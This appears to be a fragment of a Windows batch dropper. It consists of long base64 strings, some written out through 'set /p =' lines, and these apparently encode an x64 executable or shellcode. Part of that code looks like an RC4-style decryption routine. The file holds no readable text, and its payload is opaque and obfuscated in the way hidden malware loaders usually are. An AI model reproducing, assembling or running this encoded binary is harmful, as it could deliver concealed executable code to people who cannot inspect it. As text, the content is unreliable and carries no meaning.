MzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzM
set /p =zMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzEiJTCQISIlUJBBMiUQkGFVBV0FWSMfADwAAAEiD7AhIxwQkAAAAAEj/yHXvSIPsKEiLlCTQAAAASI1MJChIg+wQ6PoFAQBIg8QQSMdEJEgB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
set /p =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
